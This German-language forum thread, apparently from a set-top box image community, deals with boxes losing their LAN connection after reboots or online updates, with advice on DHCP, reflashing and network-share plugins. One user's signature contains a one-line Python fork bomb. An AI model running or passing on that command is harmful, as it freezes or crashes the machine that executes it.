LAN Verbindung nicht mehr da

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • LAN Verbindung nicht mehr da

      Hallo zusammen.

      Heute Nacht war nach einem Neustart mein LAN in der Box weg. Egal ob Neustart von GUI oder Ausschalten und neu starten. Habe die Box neu geflasht, seit dem gehts wieder. Kennt jemand dieses Problem und die Ursache dafür? Habe seit dem Flashen immer alle Updates installiert. Das geflashte Image vor dem Defekt war vom 29. Januar 2017.

      Wie gesagt, nach Neuinstallation läuft wieder alles. Also keine Hektik. Würde mich nur interessieren, ob ich der Einzige bin/war, bei dem das passiert ist.

      DerManuel
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"
    • Nein, du bist nicht der einzige. Was da passiert sein kann, kann ich dir aber auch nicht sagen.
      Das Problem hatte ich auch mit mein 820HD gehabt, am nächsten Tag die Box wie gewohnt gestartet und schon war kein LAN-Verbindung mehr vorhanden, auch ihn zu konfigurieren war nicht möglich, im Heimnetzwerk per telnet/ftp könnte ich auch kein Verbindung mehr herstellen. Musste halt ein Backup neu flashen damit die Box Online gehen kann, und seitdem ist das Problem nicht mehr aufgetreten ;) . um welche Box handelt es sich bei dir?
      Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du.

      Dieser Beitrag wurde bereits 7 mal editiert, zuletzt von Gresu77 ()

    • ich glaube er hat genau das gleiche Problem wie ich es schon mal hatte, Box tat so als ob sie keinen LAN Verbindung mehr hat. Und Kommunikation im heimnetzwerk gleich Null.
      Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Gresu77 ()

    • LAN Verbindung nicht mehr da

      Bei mir hat die 820HD mal willkürlich sich selber irgendeine ip-adresse gegeben, die absolut nicht zu meinem Netzwerk passte.... Auch manuell zuweisen ging dann nicht mehr, hab ne komplett Sicherung zurück geflasht, alles gut...
      Also immer schön Sicherung machen, gelle.... :cool:

      Gesendet von meinem XT1032
    • Wenn die Box eine IP bekommt, die nicht zum Netzwerk passt, dann ist es häufig der Fall, dass der DHCP Server nicht erreicht wurde oder dass die Verfügbaren Adressen ausgegangen sind.

      Bei manueller Eingabe muss man daran denken, auch DNS zusätzlich per Hand einzutragen.
    • Meine Box ist eine 7080 HD. Sobald ich in den Netzwerkeinstellungen irgendwas auswähle, startete die Box neu. In der Interfaces waren alle Einträge korrekt, das Interface war richtig zusortiert und auch mein lokaler DNS war entsprechend eingetragen. Das Verhalten der Box zeigte auf ein defektes NIC. Das konnte ich aber im Wartungsmodus widerlegen. Box entsprechend gestartet, hatte sie gleich eine IP über den DHCP, der zwar immer läuft, meine Boxen werden allerdings im Produktivbetrieb alle mit einer statischen Adresse betrieben. Und über diese Adresse konnte ich Dateien lesen und neu flashen. Link und Speed am Switchport passten auch. Wahrscheinlich war eine Datei warum auch immer defekt.
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"
    • Mein LAN ist schon wieder tot! Was ist da los?

      Gleicher Fehler wie vorgestern. Box war fertig installiert und lief zwei Tage fehlerfrei. Jetzt mache ich ein Online Update und meine Netzverbindung stellt sich wieder tot. Media Portal meldet "keine Verbindung zum Internet", Netzwerkbrowser verursacht GreenScreen, Netzwerkeinstellungen zeigen keine Verbindungen an und Newnigma Services lassen sich gar nicht aufrufen.

      Aktuelles Image, Mediaportal 7.7.7, OScam vom Feed, Netzwerkbrowser vom Feed, Metrix Skin HD und Picons draufgeschoben. Freigaben über automounts eingebunden.

      Hat das jemand ähnlich und auch die Schwierigkeiten nach einem Update?
      :mauer: :mauer: :mauer:
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"
    • Im Wiederherstellungsmodus komme ich durchaus auf die Box. Aber /media ist leer. Und da liegt meines Erachtens die Crashlog. Aber klar, die Box kommt gar nicht zum Mounten. Der Filebrowser ist auch tot.
      Dateien
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von DerManuel ()

    • HILFE!!!

      Mit Umstieg auf den Mount Manager und Netzwerkbrowser habe ich wieder keine NIC mehr! Nach dem Herausnehmen der autofs stelle ich also um und installiere den Netzwerkbrowser und richte meine drei lächerlichen Pfade ein. Nach Neustart existiert wieder keine NIC. Keine Anbindung an NAS, ans Internet, Paketmanager, andere Boxen, keine Partnerbox, minutenlanger Neustart und in den Neztwerkeinstellungen keinen Eintrag. Die Box empfängt Fernsehen und Zugriff auf die lokale Platte ist da. Da kein Crash passiert, weiss ich nicht, wie ich helfen kann, um Hilfe zu bekommen.

      Aktuelles Image, Metrix Style HD, Media Portal, OScam Server, Picons.
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"
    • Willkommen im Reich des tollen Netzwerkbrowsers, der ja alles besser machen soll. Hast du es schon versucht, mit dem DMM original nachzuvollziehen? Wenn du da den gleichen Effekt hast, vielleicht mal im Dreamboard dein Problem schildern.

      Ich fühle mit dir .....
    • Ich habe 7 freigaben mit dem netzwerk browser eingebunden die sind auch da und man kann auch zugreifen nur wenn ich auf verwaltung gehe ist kein eintrag im netzwerkbrowser zu sehen auf der 900er.Ich bin begeistert <X
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Buffel4You hat in seinem Thread "Suche ein relativ stabiles Image" in etwa das gleiche Problem wie ich! Inwiefern können wir auf Unterstützung hoffen?
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"
    • Sorry, aber das ist eine ziemlich dämliche Frage.
      [ironie]Wir tun natürlich alles dafür, dass das Image möglich unstabil ist und ihr möglichst viel Ärger habt.[/ironie]

      Wenn es dir nicht passt, mach kein Update oder nutze ein anderes Image. Ich hab hier echt die Schnauze voll.

      Im übrigen hatte ich noch keine STB (und ich hatte schon sehr viele seit 1997), die so zuverlässig läuft wie die 7080 und 900 unter dem aktuellen OE2.5 Image. An den letzten GS kann ich mich nicht mal erinnern.